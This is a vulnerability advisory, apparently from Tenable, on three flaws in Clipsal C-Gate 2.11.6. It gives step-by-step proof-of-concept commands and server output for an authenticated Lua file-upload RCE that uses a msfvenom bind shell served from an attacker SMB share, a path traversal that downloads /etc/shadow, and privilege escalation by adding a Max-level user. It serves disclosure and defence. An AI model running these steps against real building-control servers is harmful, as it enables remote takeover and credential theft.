Tenable found multiple vulnerabilities in the C-Gate 2.11.6.
1) CVE-2021-22796 - Authenticated main.lua File Upload RCE
The following demonstrates how an authenticated user with C-Gate Admin access level can upload a malicious executable file to the C-Gate Windows host and run the executable as Network Service. For C-Gate versions prior to 2.11.6 (comes with CBusToolkit 1.15.8), the uploaded executable is run as SYSTEM.
The C-Gate server implements a LUA RUN command:
help LUA
101-Help: LUA commands:
101-Help: LUA ? Help for these commands
101 Help: LUA RUN - Run main.lua
The command runs the main.lua file located in the lua sub directory in the current directory:
(hr = new hR()).a = new hT("lua", "main.lua");
The attacker can perform the following steps to achieve RCE:
Create a malicious exe (i.e., tcp_bind_shell.exe):
msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=4444 -f exe -o /tmp/tcp_bind_shell.exe
Create main.lua:
echo -ne 'os.execute("lua\\\\tcp_bind_shell.exe")' > /tmp/main.lua
Setup an SMB server on attacker's host to serve tcp_bind_shell.exe and main.lua:
smbserver.py myshare /tmp
Login with a user that has Admin access level:
nc 20023
201 Service ready: Clipsal C-Gate Version: v2.11.6 (build 3271) #cmd-syntax=1.0
LOGIN admin aaa
211 Access level set to: Admin
Escalate to Max access level so that FILE commands can be run:
ACCESS ADD user attacker aaa Max
200 OK.
LOGIN attacker aaa
211 Access level set to: Max
Create the lua directory in the current directory (Default:C:\Clipsal\C-Gate2):
200 OK.
Set project archive directory to lua so that the attacker-controlled files are dropped to this directory:
CONFIG GET project.default.archive-dir
303 project.default.archive-dir=tag/archived
CONFIG SET project.default.archive-dir lua
200 OK.
Upload a malicious exe (i.e., tcp_bind_shell.exe) to the lua directory:
PROJECT RESTORE exe \\\\\myshare\tcp_bind_shell.exe
200 OK.
PROJECT ARCHIVE exe tcp_bind_shell.exe
200 OK.
Upload attacker-controlled main.lua, which contains single line: os.execute("lua\\tcp_bind_shell.exe"):
PROJECT RESTORE lua \\\\\myshare\main.lua
200 OK.
PROJECT ARCHIVE lua main.lua
200 OK.
Run the attacker-controlled main.lua:
2) CVE-2021-22720 - PROJECT RESTORE Incomplete Fix
An authenticated attacker with C-Gate Admin access level can read sensitive files using the PROJECT RESTORE and FILE DOWNLOAD commands. The following shows the attacker is able to download /etc/shadow on a Linux system on which the C-Gate server is running as root.
Login with a user that has Admin access level:
nc 20023
201 Service ready: Clipsal C-Gate Version: v2.11.6 (build 3271) #cmd-syntax=1.0
LOGIN admin aaa
211 Access level set to: Admin
Escalate to Max access level so that FILE commands can be run:
ACCESS ADD user attacker aaa Max
200 OK.
LOGIN attacker aaa
211 Access level set to: Max
Copy /etc/shadow to project directory:
PROJECT RESTORE shadow ../../../../../../../../../../../../etc/shadow
200 OK.
Determine the project directory path:
CONFIG GET project.default.dir
303 project.default.dir=tag/
List project files in the project directory:
304-directory="/work/schneider/cgate/unpacked/cgate/tag" files=3
305-name="EXAMPLE.xml" size=77744 modified=Tue Jul 05 21:21:38 UTC 2016
305-name="HOME.xml" size=13671 modified=Tue Jul 05 21:21:38 UTC 2016
305 name="SHADOW.xml" size=1116 modified=Sat May 25 05:23:20 UTC 2021
Download /etc/shadow (contents base64 encoded):
345-Start file download for file: tag/SHADOW.xml
346 End file download
All PoCs use Kali Linux as attacker's host, where Metasploit and python-impacket (for smbserver.py) are installed.
3) Access Level Escalation - CVE-2021-22784
A user with C-Gate Admin access level can add a user with a higher level and then logs in as that user to gain a higher access level. This allows an authenticated attacker to run more privileged commands that are not allowed at the Admin level.
According to the C-Gate documentation (CGateManual.pdf), access levels are as follows, with each later level incorporating the functions of the previous level:
None - no access at all. Use this to refuse connections.
Connect - allow a connection to be established (to the command interface only) and execute the LOGIN command or the license challenge & response commands.
Monitor - allow monitoring and query of the status of objects and C-Bus, but do not allow any changes
Operate - allow set, on, off, ramp operations – allow changes to be made to the system
Admin - allow C-Gate shutdown and administration functions
Program - allow C-Bus networks to be programmed
Debug - allow debugging functions to be performed
In addition, undocumented access levels Clipsal and Max are defined in cgate.jar, and these two access levels are higher than the Debug level:
private static String[] m = new String[] { "None", "Connect", "Monitor", "Operate", "Admin", "Program", "Debug", "Clipsal", "Max" };
The following shows a scenario of access level escalation:
- A remote user connects to the C-Gate server command port. Initially, the user has Connect access level. So he cannot run the FILE command.
- The user logs in as a user (admin) that has Admin access level. He still cannot run the FILE command at the Admin level.
- The user adds a user (attacker) with Max access level and logs in as that user. Now he can run the FILE command.
nc 20023
201 Service ready: Clipsal C-Gate Version: v2.11.6 (build 3271) #cmd-syntax=1.0
210 Access level: Connect
420 Access denied.
LOGIN admin aaa
211 Access level set to: Admin
420 Access denied.
ACCESS ADD user attacker aaa Max
200 OK.
LOGIN attacker aaa
211 Access level set to: Max
101-Help: FILE commands:
101-Help: FILE ? Help for these commands
101-Help: FILE DELETE - Remove a file or directory from the server
101-Help: FILE DIR - Return a list of directory contents for the given directory
101-Help: FILE DOWNLOAD - Download a copy of a file as a base-64 encoded chunk of data
101-Help: FILE LS - Return a list of directory contents for the given directory
101-Help: FILE MD5 - Calculate an MD5 hash of a local filename on the server
101-Help: FILE MKDIR - Return a list of directory contents for the given directory
101 Help: FILE UPLOAD - Upload a file to the server as a base-64 encoded chunk of data